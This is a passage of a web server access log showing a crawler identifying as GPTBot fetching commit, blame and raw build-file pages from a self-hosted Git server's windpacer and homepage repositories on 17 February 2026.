AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" +[17/Feb/2026:17:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" +[17/Feb/2026:17:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15796] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild" [Client 74.7.227.38] [Length 99144] [Gzip 18.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" +[17/Feb/2026:17:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist" [Client 74.7.227.38] [Length 21042] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" +[17/Feb/2026:17:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcodec.hpp" [Client 74.7.227.38] [Length 21407] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcodec.hpp" [Client 74.7.227.38] [Length 25650] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14083] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14053] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:17:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10902] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14079] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:17:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:17:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13767] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 